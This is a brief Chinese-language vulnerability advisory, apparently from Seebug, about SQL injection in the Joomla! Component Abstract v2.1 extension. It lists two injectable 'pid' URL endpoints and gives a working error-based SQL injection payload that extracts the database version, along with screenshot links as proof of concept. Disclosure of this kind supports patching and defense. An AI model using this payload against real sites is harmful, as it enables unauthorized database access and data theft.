Joomla! Component Abstract v2.1 - SQL Injection
Joomla! Component Abstract v2.1,存在参数过滤不严,导致了sql注入漏洞
注入点:
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
报错注入 payload:
1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
测试截图:
![](https://images.seebug.org/contribute/d858ed32-545c-4385-8ab2-52a8e6500f63)
PoC验证:
![](https://images.seebug.org/contribute/ee7e9e3e-ed3d-4a6b-9ac3-408dc51939cc)
暂无评论